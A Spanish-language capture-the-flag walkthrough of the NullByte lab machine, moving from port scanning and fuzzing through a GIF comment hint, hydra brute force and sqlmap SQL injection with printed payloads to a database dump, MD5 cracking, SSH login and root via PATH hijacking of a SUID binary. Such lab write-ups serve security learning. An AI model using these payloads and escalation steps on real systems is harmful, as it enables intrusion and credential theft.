Ir al contenido
nyalex/docs

NullByte

Descubrimiento

Sección titulada «Descubrimiento»

Empezaremos por descubrir los puertos disponibles en la máquina que nos han dado. La IP de la máquina es 172.20.0.116.

NMAP

Sección titulada «NMAP»

Primero tiramos un nmap para descubrir los puertos abiertos de la máquina.

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ nmap 172.20.0.116 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-18 16:39 CET
Nmap scan report for 172.20.0.116
Host is up (0.0044s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
49656/tcp open  unknown
MAC Address: BC:24:11:8E:0A:85 (Proxmox Server Solutions GmbH)


Nmap done: 1 IP address (1 host up) scanned in 5.35 seconds

Hay varios puertos abiertos. A priori el más interesante es el HTTP, ya que los otros puertos no parecen ser “sinceros”, no parecen ser para lo que normalmente serían.

He intentado conectarme por HTTP a todos, pero únicamente el puerto :80 es realmente una web.

Fuzzing

Sección titulada «Fuzzing»

Ahora que sabemos que tenemos una página web, le haremos un buen fuzzing. Le pondré la clásica lista y a ver qué datos recoge.

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ffuf -u http://172.20.0.116/FUZZ -w /mnt/d/Otros/wordlists/directory-list-2.3-big.txt -fc 404


        /'___\  /'___\           /.___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/


       v2.1.0-dev
________________________________________________


 :: Method           : GET
 :: URL              : http://172.20.0.116/FUZZ
 :: Wordlist         : FUZZ: /mnt/d/Otros/wordlists/directory-list-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________


uploads                 [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 4ms]
javascript              [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 4ms]
phpmyadmin              [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 5ms]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 6ms]
:: Progress: [1273833/1273833] :: Job [1/1] :: 4761 req/sec :: Duration: [0:03:28] :: Errors: 0 :^C

Mientras dejo que se vaya ejecutando he estado probando las rutas que me ha ido dando, pero no deja entrar a ninguna de las rutas, o no hay nada interesante dentro de ellas. Actualmente lo único que podemos ver en la página web principal es una sola imagen sobre un texto.

Página principal de NullByte

Explotación

Sección titulada «Explotación»

Ahora mismo ya he mirado todo lo que me ofrece a simple vista la máquina, así que pasamos a la parte de intentar explotarla.

Estenanografía

Sección titulada «Estenanografía»

Lo primero que voy a mirar es la imagen que hay en la página principal, ya que es uno de los únicos indicios que tengo.

ojo

Esta es la imagen directamente de la página web, me la he descargado. Ahora toca analizarla y ver si tiene algún contenido oculto.

Hay varios comandos para ver dentro de la imagen, el más “básico” puede ser un strings, pero hay otros que están mejor, como exiftool, que te lo pone todo más bonito.

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ exiftool /mnt/d/Otros/main.gif
ExifTool Version Number         : 13.36
File Name                       : main.gif
Directory                       : /mnt/d/Otros
File Size                       : 17 kB
File Modification Date/Time     : 2026:02:18 16:46:28+01:00
File Access Date/Time           : 2026:02:18 16:46:36+01:00
File Inode Change Date/Time     : 2026:02:18 16:46:28+01:00
File Permissions                : -rwxrwxrwx
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

Ojo con la línea Comment : P-): kzMb5nVYJw, que nos ofrece información interesante.

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ curl http://172.20.0.116/kzMb5nVYJw/
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ hydra -l dummy -P /mnt/d/Otros/wordlists/rockyou.txt 172.20.0.116 http-form-post '/kzMb5nVYJw/index.php:key=^PASS^:invalid key' -l -x -t 64 -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-18 16:58:56
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://172.20.0.116:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 14975.00 tries/min, 14975 tries in 00:01h, 14329424 to do in 15:57h, 64 active
[80][http-post-form] host: 172.20.0.116   login: -x   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-18 17:00:35
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap --url http://172.20.0.116/kzMb5nVYJw/420search.php?usrtosearch=test --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.11#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting @ 17:01:17 /2026-02-18/


[17:01:17] [INFO] testing connection to the target URL
[17:01:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:01:17] [INFO] testing if the target URL content is stable
[17:01:17] [INFO] target URL content is stable
[17:01:17] [INFO] testing if GET parameter 'usrtosearch' is dynamic
[17:01:18] [WARNING] GET parameter 'usrtosearch' does not appear to be dynamic
[17:01:18] [INFO] heuristic (basic) test shows that GET parameter 'usrtosearch' might be injectable (possible DBMS: 'MySQL')
[17:01:18] [INFO] testing for SQL injection on GET parameter 'usrtosearch'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]


for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]


[17:01:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:01:37] [INFO] testing 'Generic inline queries'
[17:01:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:01:37] [WARNING] reflective value(s) found and filtering out
[17:01:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:01:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:01:38] [INFO] GET parameter 'usrtosearch' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="ID")
[17:01:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:01:38] [INFO] GET parameter 'usrtosearch' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[17:01:38] [INFO] testing 'MySQL inline queries'
[17:01:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:01:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:01:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:01:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:01:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:01:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:01:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:01:48] [INFO] GET parameter 'usrtosearch' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:01:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:01:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:01:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:01:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:01:48] [INFO] target URL appears to have 3 columns in query
[17:01:48] [INFO] GET parameter 'usrtosearch' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[17:01:48] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[17:01:48] [WARNING] automatically patching output having last char trimmed
GET parameter 'usrtosearch' is vulnerable. Do you want to keep testing the others (if any)? [y/N]


sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=test" OR NOT 6126=6126#


    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: usrtosearch=test" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(3085=3085,1))),0x716a766a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- xkZL


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=test" AND (SELECT 7779 FROM (SELECT(SLEEP(5)))mRlW)-- ZSQL


    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=test" UNION ALL SELECT CONCAT(0x71786a7871,0x6359546c4256656e5a697764546e65646d4c4c6c4c4348664b6e5365706e57737a504b4769764659,0x716a766a71),NULL,NULL#
---
[17:01:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[17:01:51] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth


[17:01:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/172.20.0.116'


[*] ending @ 17:01:51 /2026-02-18/




┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap --url http://172.20.0.116/kzMb5nVYJw/420search.php?usrtosearch=test -D seth --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting @ 17:02:08 /2026-02-18/


[17:02:08] [INFO] resuming back-end DBMS 'mysql'
[17:02:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=test" OR NOT 6126=6126#


    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: usrtosearch=test" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(3085=3085,1))),0x716a766a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- xkZL


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=test" AND (SELECT 7779 FROM (SELECT(SLEEP(5)))mRlW)-- ZSQL


    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=test" UNION ALL SELECT CONCAT(0x71786a7871,0x6359546c4256656e5a697764546e65646d4c4c6c4c4348664b6e5365706e57737a504b4769764659,0x716a766a71),NULL,NULL#
---
[17:02:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[17:02:08] [INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+


[17:02:08] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/172.20.0.116'


[*] ending @ 17:02:08 /2026-02-18/




┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ sqlmap --url http://172.20.0.116/kzMb5nVYJw/420search.php?usrtosearch=test -D seth -T users --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting @ 17:02:15 /2026-02-18/


[17:02:15] [INFO] resuming back-end DBMS 'mysql'
[17:02:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=test" OR NOT 6126=6126#


    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: usrtosearch=test" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(3085=3085,1))),0x716a766a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- xkZL


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=test" AND (SELECT 7779 FROM (SELECT(SLEEP(5)))mRlW)-- ZSQL


    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=test" UNION ALL SELECT CONCAT(0x71786a7871,0x6359546c4256656e5a697764546e65646d4c4c6c4c4348664b6e5365706e57737a504b4769764659,0x716a766a71),NULL,NULL#
---
[17:02:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[17:02:15] [INFO] fetching columns for table 'users' in database 'seth'
[17:02:15] [INFO] fetching entries for table 'users' in database 'seth'
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+


[17:02:15] [INFO] table 'seth.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/172.20.0.116/dump/seth/users.csv'
[17:02:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/172.20.0.116'


[*] ending @ 17:02:15 /2026-02-18/
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ hashid YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
Analyzing 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE'
[+] Cisco-IOS(SHA-256)
[+] Cisco Type 4


┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ hashid c6d6bd7ebf806f43c76acc3681703b81
Analyzing 'c6d6bd7ebf806f43c76acc3681703b81'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ hashcat -m 0 c6d6bd7ebf806f43c76acc3681703b81 /mnt/d/Otros/wordlists/rockyou.txt
hashcat (v7.1.2) starting


OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen AI 9 HX 370 w/ Radeon 890M, 4858/9716 MB (2048 MB allocatable), 24MCU


Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256


Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1


Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash


ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.


Watchdog: Temperature abort trigger set to 90c


Host memory allocated for this attack: 518 MB (10098 MB free)


Dictionary cache hit:
* Filename..: /mnt/d/Otros/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921511
* Keyspace..: 14344385


c6d6bd7ebf806f43c76acc3681703b81:omega


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: c6d6bd7ebf806f43c76acc3681703b81
Time.Started.....: Wed Feb 18 17:03:42 2026 (0 secs)
Time.Estimated...: Wed Feb 18 17:03:42 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/mnt/d/Otros/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1406.1 kH/s (0.56ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> 280690
Hardware.Mon.#01.: Util:  3%


Started: Wed Feb 18 17:03:41 2026
Stopped: Wed Feb 18 17:03:44 2026

omega

Ventana de terminal
┌──(kali㉿DESKTOP-3V92LT1)-[~]
└─$ ssh ramses@172.20.0.116 -p 777
The authenticity of host '[172.20.0.116]:777 ([172.20.0.116]:777)' can't be established.
ED25519 key fingerprint is: SHA256:qwvVlash7TV33eAaRVfTtUXVDL3X94TXIadEOmWw6gQ
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[172.20.0.116]:777' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
ramses@172.20.0.116's password:


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ ls -la
total 24
drwxr-xr-x 2 ramses ramses 4096 Aug  2  2015 .
drwxr-xr-x 5 root   root   4096 Aug  2  2015 ..
-rw------- 1 ramses ramses   96 Aug  2  2015 .bash_history
-rw-r--r-- 1 ramses ramses  220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3515 Aug  2  2015 .bashrc
-rw-r--r-- 1 ramses ramses  675 Aug  2  2015 .profile
ramses@NullByte:~$ ls -la ..
total 20
drwxr-xr-x  5 root   root   4096 Aug  2  2015 .
drwxr-xr-x 21 root   root   4096 Aug  1  2015 ..
drwxr-xr-x  2 bob    bob    4096 Aug  2  2015 bob
drwxr-xr-x  2 eric   eric   4096 Aug  2  2015 eric
drwxr-xr-x  2 ramses ramses 4096 Aug  2  2015 ramses
ramses@NullByte:~$
Ventana de terminal
ramses@NullByte:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs

/var/www/backup/procwatch

Ventana de terminal
ramses@NullByte:~$ /var/www/backup/procwatch
  PID TTY          TIME CMD
 1622 pts/0    00:00:00 procwatch
 1623 pts/0    00:00:00 sh
 1624 pts/0    00:00:00 ps
ramses@NullByte:~$ cd /tmp
ramses@NullByte:/tmp$ echo "/bin/bash -p" > ps
ramses@NullByte:/tmp$ export PATH=/tmp:$PATH
ramses@NullByte:/tmp$ /var/www/backup/procwatch
  PID TTY          TIME CMD
 1625 pts/0    00:00:00 procwatch
 1626 pts/0    00:00:00 sh
 1627 pts/0    00:00:00 ps
ramses@NullByte:/tmp$ whoami
ramses
ramses@NullByte:/tmp$ chmod 777 ps
ramses@NullByte:/tmp$ /var/www/backup/procwatch
bash-4.3#
Ventana de terminal
bash-4.3# ls /root
proof.txt
bash-4.3# cat /root/proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d


It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com




USE THIS PGP PUBLIC KEY


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0


mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----


bash-4.3#